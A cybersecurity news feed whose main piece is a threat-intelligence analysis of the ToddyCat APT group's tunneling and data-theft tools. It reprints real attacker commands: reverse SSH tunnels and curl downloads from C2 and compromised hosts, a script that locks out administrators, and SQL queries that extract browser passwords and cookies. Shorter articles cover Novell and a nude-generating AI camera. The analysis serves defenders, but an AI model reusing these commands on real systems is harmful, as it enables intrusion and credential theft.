As researchers continue to study these marine organisms, the MH370 mystery underscores a broader truth: the ocean’s sheer size often defies our efforts to understand it. Trying to find a needle in a haystack would be a cinch by comparison.

Featured image: “Grand Canyon Sunset Through a de Havilland DHC-6 Twin Otter Airplane Cockpit” by Nan Palmero.

Cybersecurity & cyberwarfare

2024-04-22 11:00:00

Going Canadian: The Rise and Fall of Novell

During the 1980s and 1990s Novell was one of those names that you could not avoid if you came even somewhat close to computers. Starting with selling computers and printers, they’d switch to producing networking hardware like the famous NE2000 and the inevitability that was Novell Netware software, which would cement its fortunes. It wasn’t until the 1990s that Novell began to face headwinds from a new giant: Microsoft, which along with the rest of the history of Novell is the topic of a recent article by [Bradford Morgan White], covering this rise, the competition from Microsoft’s Windows NT and its ultimate demise as it found itself unable to compete in the rapidly changing market around 2000, despite flirting with Linux.

Novell was founded by two experienced executives in 1980, with the name being reportedly the misspelled French word for ‘new’ (nouveau or nouvelle). With NetWare having cornered the networking market, there was still a dearth of networking equipment like Ethernet expansion cards. This led Novell to introduce the 8-bit ISA card NE1000 in 1987, later followed by the 16-bit NE2000. Lower priced than competing products, they became a market favorite. Then Windows NT rolled in during the 1990s and began to destroy NetWare’s marketshare, leaving Novell to flounder until it was snapped up by Attachmate in 2011, which was snapped up by Micro Focus International 2014, which got gobbled up by Canada-based OpenText in 2023. Here Novell’s technologies got distributed across its divisions, finally ending Novell’s story.

Cybersecurity & cyberwarfare

2024-04-22 10:00:00

ToddyCat is making holes in your infrastructure

We continue covering the activities of the APT group ToddyCat. In our previous article, we described tools for collecting and exfiltrating files (LoFiSe and PcExter). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.

ToddyCat is an APT group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group’s main goals is to steal sensitive information from hosts.

During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected, transferred and run all required tools with the help of PsExec or Impacket.

Tools for traffic tunneling

Having several tunnels to the infected infrastructure implemented with different tools allow attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.

Reverse SSH Tunnel

One way to gain access to remote network services is to create a reverse SSH tunnel.

Attackers use several files to launch a reverse SSH tunnel:

1. The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it
2. An OPENSSH private key file
3. The “a.bat” script to hide the private key file

The attackers transferred all files to the target host via SMB with the help of shared folders (T1021.002: Remote Services: SMB/Windows Admin Shares).

The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.
C:\program files\OpenSSH\ssh.exe
C:\programdata\sshd\ssh.exe
C:\programdata\ssh\ssh.exe
The private key files required for establishing a connection to the remote server were copied to the following paths.
C:\Windows\AppReadiness\read.ini
C:\Windows\AppReadiness\data.dat
C:\Windows\AppReadiness\log.dat
C:\Windows\AppReadiness\value.dat
OpenSSH private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.

After the private key files have been copied to the AppReadiness folder, the adversary copies and runs an a.bat script. In the attacked systems, it was found mostly in temporary directories or in users’ shared folders.
c:\users\public\a.bat
This file contains the following commands.
@[url=https://friends.deko.cloud/profile/echo]Echo of You[/url] off
::# Set Key File Variable:

Set Key="C:\Windows\AppReadiness"

takeown /f "%Key%"
icacls "%Key%" /remove "BUILTIN\Administrators" > "%temp%\a.txt"
icacls "%Key%" /remove "Administrators" >> "%temp%\a.txt"
icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "CREATOR OWNER" >> "%temp%\a.txt"
icacls "%Key%" /remove "BUILTIN\Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "Users" >> "%temp%\a.txt"
icacls "%Key%" >> "%temp%\a.txt"

::# Remove Variable:
set "Key="
In Windows, C:\Windows\AppReadiness is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.

The icacls command output for the AppReadiness folder with default values

The image above shows the default permissions for this folder:

• Administrators and system: full permissions
• Authorized users: read-only permissions

This means that regular users can view the contents of the folder.

The a.bat script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for C:\Windows\AppReadiness after the script has run:

The icacls command output for the AppReadiness folder after a.bat script has executed

Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a “no permission” error.

Access denied error and Security tab for the AppReadiness folder

To start the tunnel, attackers create a scheduled task that runs the following command.
C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o
StrictHostKeyChecking=accept-new -R 31481:localhost:53
systemtest01@103[.]27.202.85 -p 22222 -fN
This command creates an SSH connection to a remote server with the IP address 103[.]27.202.85 on port 22222 as the user named systemtestXX, where XX is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.

In the example above, the user systemtest01 establishes a connection that redirects traffic from port 31481 on the server to port 53 on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.

Each user is assigned to a different port on the infected host. For example, the user systemtest05 redirects traffic from the malicious server to port 445, normally used by SMB services.

The remote server IP information is shown in the table below.

IP	Country + ASN	Net name	Net Description	Address	Email
103.27.202[.]85	Thailand, AS58955	BANGMOD-VPS-NETWORK	Bangmod VPS Network	Bangmod-IDC Supermicro Thailand Powered by CSloxinfo	support@bangmod.co.th

The whole process of creating an SSH tunnel can be described with the diagram given below.

Diagram of SSH tunnel creation

SoftEther VPN

The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.

SoftEther VPN is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.

To launch the VPN server, the attackers used the following files:

• vpnserver_x64.exe: a digitally signed VPN server executable
• hamcore.se2: a container file that includes components required to run vpnserver_x64.exe
• vpn_server.config: server configuration

In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.

In virtually every case we observed, the attackers renamed vpnserver_x64.exe to hide its purpose in the infected system. The following names of, and paths to, this file are known:
c:\programdata\ssh\vmtools.exe
c:\programdata\lenovo\lenovo\kln.exe
c:\programdata\iobit\iobitrtt\tmp\mstime.exe
c:\perflogs\ecache\boot.exe
C:\users\public\music\wia.exe
c:\windows\debug\wia\wia.exe
c:\users\public\music\taskllst.exe
c:\programdata\lenovo\lenovo\main.exe
c:\programdata\intel\gcc\gcc\boot.exe
c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
c:\programdata\kasperskylab\kaspersky.exe
You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.

The file hamcore.se2 was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.

To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (T1021.002 Remote Services: SMB/Windows Admin Shares), and downloaded files from remote resources using the curl utility (see below).
"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o
c:\windows\debug\wia\wia.exe > C:\WINDOWS\Temp\vwqkspeq.tmp 2>&1
"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o
c:\windows\debug\wia\hamcore.se2 > C:\WINDOWS\Temp\nohEicOE.tmp 2>&1
We observed the following remote resources being used as download sources.

URL	Original file name
hxxp://www.netportal.or[.]kr/common/css/main.js	vpnserver_x64.exe
hxxp://www.netportal.or[.]kr/common/css/ham.js	Hamcore.se2
hxxp://23.106.122[.]5/hamcore.se2	Hamcore.se2
hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe	vpnserver_x64.exe
hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2	Hamcore.se2

In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options /install or /usermode_hidetray, and then edited.
"cmd.exe" /C c:\users\public\music\taskllst.exe /install > C:\Windows\Temp\fnOcaiqm.tmp 2>&1
"cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray > C:\Windows\Temp\TSwkLRsR.tmp
In this case, after installing the server in the system, the attackers changed the server settings in vpn_server.config.

Data for connecting the remote client to the server and its authentication details are added to the configuration file:

AccountName	Hostname
ha.bbmouseme[.]com	118[.]193.40.42

Ngrok agent and Krong

Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user’s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.

Ngrok is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.

The agent can be started, for instance, with the following command.
"cmd" /c "cd C:\windows\temp\ & Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 --
authtoken 2GskqGD<token>txB7WyV"
The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file side-loaded (T1574.002 Hijack Execution Flow: DLL Side-Loading) with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.
"cmd" /c "cd C:\windows\temp\ & SystemInformation.exe 0.0.0.0 54112"
Krong is a proxy that encrypts the data transmitted through it using the XOR function.

Code snippet for deciphering received data

This allows Krong to hide the contents of the traffic to evade detection.

FRP client

After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the FRP client. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.

The attackers used two files to run the client:

• Frpc.exe: a FRP client executable file
• Frpc.toml: a client configuration file

The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.

After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.
c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini
This starts the FRP client with the configuration file “tc.ini”. The traffic is then routed from C2 through this tool.

Data collection tools

Cuthead for data collection

Recently, ToddyCat started using a new tool we named cuthead to search for documents. The name originated from the “file description” field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.

Cuthead tool accepts the following arguments:
fkw.exe <date> <extensions>

[keywords]

• Date: the date when the file was last modified, in yyyyMMdd The search looks for files modified on that date or later
• Extensions: a string without spaces that contains file extensions separated by semicolons
• Keywords: a string without spaces that contains semicolon-delimited words to look for in file names

Here is an example of a cuthead launch command.
"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx
In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.

Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (T1005 Data from Local System). Folders that contain the following substrings are excluded from the search.
$
Windows
Program Files
Programdata
Application Data
Program Files (x86)
Documents and Settings
Also, the files are excluded from the search if they meet the following criteria:

• The file size is greater than 50 Mb (52428800 bytes).
• The file extensions do not match those specified in the command-line parameters.
• The names do not contain the keywords specified in the command-line parameters.

A list of files found by the search is passed to the function that creates ZIP archives with the password “Unsafe404”. In different versions of the tool, this function has different names but the same purpose. The open-source tool icsharpcode/SharpZipLib v. 0.85.4.369 is used for creating archives (T1560.002 Archive Collected Data: Archive via Library).

Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.

WAExp: WhatsApp data stealer

This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser’s local storage files.

The executable accepts the following arguments.
app.exe [check|copy|start]
[remote]Check: checks the presence of data on the host.
Copy: copies data it finds to the temporary folder.
Start: first, copies the data to the temporary folder and then, packs the data into an archive file.
Remote: the name of the remote host.

When executed with “check“, the tool begins searching for user folders. If “remote” is specified, user folders are searched along “\\[remote]\C$\users\“. If it is not specified, the malware uses the environment variable %SystemDrive% value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.
All Users
Default User
Default
Public
After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.

ForChrome, the tool opens <User>\Appdata\local\Google\ and for Edge, <User>\Appdata\local\Microsoft\Edge\. Inside these, it looks for a folder with the following name inside the subfolders.
https_web.whatsapp.com_0.indexeddb.leveldb
For Mozilla, the tool opens<User>\Appdata\roaming\ and looks for a folder with the following name inside the subfolders:
https+++web.whatsapp.com
Roaming may contain several Mozilla folders with web.whatsapp.com storage data. For example,Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.

WAExp “check” output with results for Chrome, Edge, Firefox and Thunderbird

In the image above, you can see the output of the tool running with the “check” parameter. It shows storage files for Chrome, Edge and Firefox, as well as the Thunderbird mail client detected on the host.

When executed with the “copy” parameter, WAExp copies all whatsapp.com data storage files in the system to the following temporary storage folder.
C:\Programdata\Microsoft\Default\
The last parameter that the tool uses is “start”. It gathers target files inside a temporary folder, as described in the copy function, and packs these into an archive with the help of the System.IO.Compression.ZipFile module (T1560.002 Archive Collected Data: Archive via Library).

It saves the archive file under a name consisting of the word ‘Default’ and a timestamp, without extension, at the following path:
C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss
After that, it deletes the temporary folder, along with the web browsers’ and other clients’ folders containing web.whatsapp.com data.

The image below shows an example of WAExp output when run with the various startup parameters.

WAExp output for its various command-line parameters

The operations shown above collect Chrome data and generate an archive, whose contents are shown below.

Archive file containing data stolen by WAExp

TomBerBil for stealing passwords from browsers

In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (T1555.003 Credentials from Password Stores: Credentials from Web Browsers).

There are many open-source tools available for decrypting storage data, one of these being mimikatz. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.

To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from Chrome and Edge. Both browsers use the CryptProtectData feature from DPAPI (Data Protection Application Programming Interface) to encrypt data. It protects data with the current user’s password and a special encryption master key.

All TomBerBil variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of explorer.exe. It identifies the process users and compiles a list.

Username identification function

The image above shows an example of the function that identifies users by process ID. It sends a WMI request to the Win32_Process class to receive an object whose processID property equals the given PID. It then calls the GetOwner method, which returns the user and domain name for the process.

After this, the malware searches for the encryption key, stored in the encrypted_key field in the following browser JSON files.
%LOCALAPPDATA%\Google\Chrome\User Data\Local State
%LOCALAPPDATA%\Microsoft\Edge\User Data\Local State
It then impersonates the users it identified and attempts to decrypt the master key using the CryptUnprotectData function. To do this, it calls Unprotect function from the System.Security.Cryptography.ProtectedData package, which, in turn, uses CryptUnprotectData function call from Windows DPAPI.

Calling the Unprotect function

The image above shows an example of the Unprotect function call, which receives an array of bytes obtained from the encrypted_key field. The value of DataProtectionScope.CurrentUser is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.

If the decryption is successful, the malware searches for Login Data and \Network\Cookies files inside the following folders.
%LOCALAPPDATA%\Google\Chrome\User Data\Default
%LOCALAPPDATA%\Google\Chrome\User Data\Profile *
It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.
SELECT origin_url, username_value, password_value FROM logins
SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as
expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies
Data retrieved this way is decrypted with the master key and saved in special files.

Most versions of the malware tool log their actions. Below is an example of a log file that they generate:
[+] Begin 7/28/2023 1:12:37 PM
[+] Current user SYSTEM

[5516] [explorer]
[UserName][+] Impersonate user UserName
[+] Current user UserName
[+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
[+] MasterKeyBytes: 6j<...>k=
[>] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
[+] Delete File C:\Windows\TEMP\tmpF319.tmp
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
[+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
[+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
[+] MasterKeyBytes: fv<...>GM=
[>] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
[+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
[+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
[+] Recvtoself
[+] Current user SYSTEM
[+] End 7/28/2023 1:12:52 PM
One of the variants mimics Kaspersky Anti-Virus. This executable, written in .NET, is named avpui.exe (T1036.005 Masquerading: Match Legitimate Name or Location) and contains relevant metadata:

Metadata of the tool pretending to be KAV

Some versions of the tool required specific command-line parameters to start. An example can be seen below:

A TomBerBil variant started with a parameter

In several cases, beside using TomBerBil, the adversary created a shadow copy of the disk and archived the User Data file with 7zip for the further exfiltration.
wmic shadowcopy call create Volume='C:\'
"cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\<username>\AppData\Local\Google\
Chrome\"User Data\"

Conclusion

We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.

To protect the organization’s infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords across different services poses a risk of more data becoming available to attackers.

Indicators of compromise

Files

1D2B32910B500368EF0933CDC43FDE0B	WAExp
5C2870F18E64A14A64ABF9A56F5B6E6B	WAExp
AFEA0827779025C92CAB86F685D6429A	cuthead
C7D8266C63F8AECA8D5F5BDCD433E72A	cuthead
750EF49AFB88DDD52F6B0C500BE9B717	TomBerBil
853A75364D76E9726474335BCD17E225	TomBerBil
BA3EF3D0947031FB9FFBC2401BA82D79	Krong

legitimate tools

4A79A8B1F6978862ECFA71B55066AADD	FRP client
1F514121162865A9E664C919E71A6F62	vpnserver_x64.exe
6F32D6CFAAD3A956AACEA4C5A5C4FBFE	vpnserver_x64.exe
9DC7237AC63D552270C5CA27960168C3	ngrok.exe
34985FAE5FA8E9EBAA872DE8D0105005	ngrok.exe

C2 addresses

103.27.202[.]85	– SSH server
118.193.40[.]42	– Server from SoftEther VPN
Ha[.]bbmouseme[.]com	– Server from SoftEther VPN

Links

hxxp://www.netportal.or[.]kr/common/css/main.js	vpnserver_x64.exe
hxxp://www.netportal.or[.]kr/common/css/ham.js	Hamcore.se2
hxxp://23.106.122[.]5/hamcore.se2	Hamcore.se2
hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe	vpnserver_x64.exe
hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2	Hamcore.se2

---

https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/

Cybersecurity & cyberwarfare

2024-04-22 09:25:08

Gli “incident” aziendali: cosa sono e come gestirli al meglio

Nell’attuale panorama aziendale nazionale, appare sempre più evidente uno specifico trend che riguarda tutte le società: la tendenza ad avere un costante e continuo sviluppo organizzativo, spesso caratterizzato dall’adozione di nuove tecnologie.

Ciò rende i processi aziendali sempre più complessi e, pertanto, soggetti a rischi e vulnerabilità tali da determinare potenziali conseguenze negative per le Organizzazioni e per i loro Clienti.

In KRUK Italia, azienda operante nel settore della gestione del debito, ogni evento che può comportare un effetto negativo per la società stessa e per i suoi clienti viene definito con il termine “Incident”; Un incident può manifestarsi in una varietà di forme: dall’interruzione dei servizi informatici fondamentali per l’operatività fino a ricomprendere ad esempio le violazioni dei dati personali così come definiti all’art 4 del Regolamento UE 2016/679 (“GDPR”).

KRUK Italia al fine di far fronte ad una pronta ed efficace gestione di questi eventi, ha sviluppato attorno ad essi un consolidato ed efficace sistema che permette di tutelare i Clienti e contemporaneamente trarre un’opportunità di miglioramento.

Nel processo di gestione degli incident, la formazione del personale è una fase prioritaria. Ogni dipendente, infatti, deve essere in grado di identificare prontamente situazioni che potrebbero configurarsi come incident e segnalarle senza indugio al team designato per la loro ricezione e la registrazione.

Tale team condurrà un’indagine preliminare dopo la quale assegnerà l’incident alla sezione competente in base all’area di rischio.

Successivamente, sarà compito della sezione competente analizzare l’incident assegnato, raccomandando e supervisionando l’implementazione di azioni riparatorie immediate e azioni preventive al fine di evitare che lo stesso incident si ripresenti in futuro.

In questo processo, due sono i fattori importanti da tenere in considerazione: la tempestività e l’accuratezza dell’indagine.

Il rilevamento dell’incidente, la segnalazione alla sezione competente e la seguente fase di analisi dell’evento devono avvenire in tempi rapidi, consentendo così l’implementazione immediata di azioni correttive per mitigare gli impatti e proteggere al meglio i Clienti.

D’altronde, se l’incident riguarda dati personali, la tempestività nella gestione dell’incident è un obbligo previsto dal GDPR che all’art. 33 rubricato “Notifica di una violazione dei dati personali all’autorità di controllo” obbliga il Titolare del trattamento, in presenza di specifici rischi per gli interessati, a notificare senza ingiustificato ritardo ed entro 72 ore dal momento in cui ne è venuto a conoscenza l’Autorità di controllo competente.

Nella notifica occorre fornire una serie di informazioni desumibili solo a seguito di un’indagine completa dell’incident, come ad esempio descrivere la natura della violazione, le probabili conseguenze per gli interessati e le successive azioni intraprese per porre rimedio alla violazione avvenuta e attenuarne i possibili effetti negativi.

Dopo la prima fase investigativa che consente di intraprendere le azioni correttive in tempi rapidi, successivamente è bene approfondire accuratamente le cause dell’incident fino a risalire alla sua causa radice; infatti, solo con la sua individuazione e la sua successiva rimozione, sarà possibile prevenire eventi simili in futuro.

In KRUK Italia, per individuare la causa radice di un incident, viene utilizzata l’innovativa metodologia dei “5 Perché”. La sezione competente e preposta all’individuazione delle possibili azioni correttive si interroga sul “perché” sia avvenuto l’incident, cercando di risalire ad una motivazione differente fino a cinque volte consecutive. Il momento in cui terminano le motivazioni elencate coincide con il riconoscimento del fattore primario scatenante.

L’aumento delle attività di impresa rappresenta purtroppo una condizione fertile al loro manifestarsi. Per tale ragione, KRUK Italia ha sviluppato nel corso degli anni un efficace sistema di segnalazione e gestione degli incident, in grado di consentire la piena risoluzione degli stessi.

In conclusione, di fronte all’eventualità, sempre più concreta, che si possano verificare continui incident in un contesto aziendale, diviene importante per le aziende intervenire in modo allineato all’approccio operativo promosso da KRUK Italia, così da assicurare tempestività ed efficienza nella gestione. Un’efficace gestione degli incident non solo protegge i clienti dall’impatto negativo di tali eventi, ma offre anche alle Organizzazioni l’opportunità di trasformare le difficoltà in un processo di miglioramento continuo.

L'articolo Gli “incident” aziendali: cosa sono e come gestirli al meglio proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-22 08:00:00

AI Camera Only Takes Nudes

One of the cringier aspects of AI as we know it today has been the proliferation of deepfake technology to make nude photos of anyone you want. What if you took away the abstraction and put the faker and subject in the same space? That’s the question the NUCA camera was designed to explore. [via 404 Media]

[Mathias Vef] and [Benedikt Groß] designed the NUCA camera “with the intention of critiquing the current trajectory of AI image generation.” The camera itself is a fairly unassuming device, a 3D-printed digital camera (19.5 × 6 × 1.5 cm) with a 37 mm lens. When the camera shutter button is pressed, a nude image is generated of the subject.

The final image is generated using a mixture of the picture taken of the subject, pose data, and facial landmarks. The photo is run through a classifier which identifies features such as age, gender, body type, etc. and then uses those to generate a text prompt for Stable Diffusion. The original face of the subject is then stitched onto the nude image and aligned with the estimated pose. Many of the sample images on the project’s website show the bias toward certain beauty ideals from AI datasets.

Looking for more ways to use AI with cameras? How about this one that uses GPS to imagine a scene instead. Prefer to keep AI out of your endeavors to invade personal space? How about building your own TSA body scanner?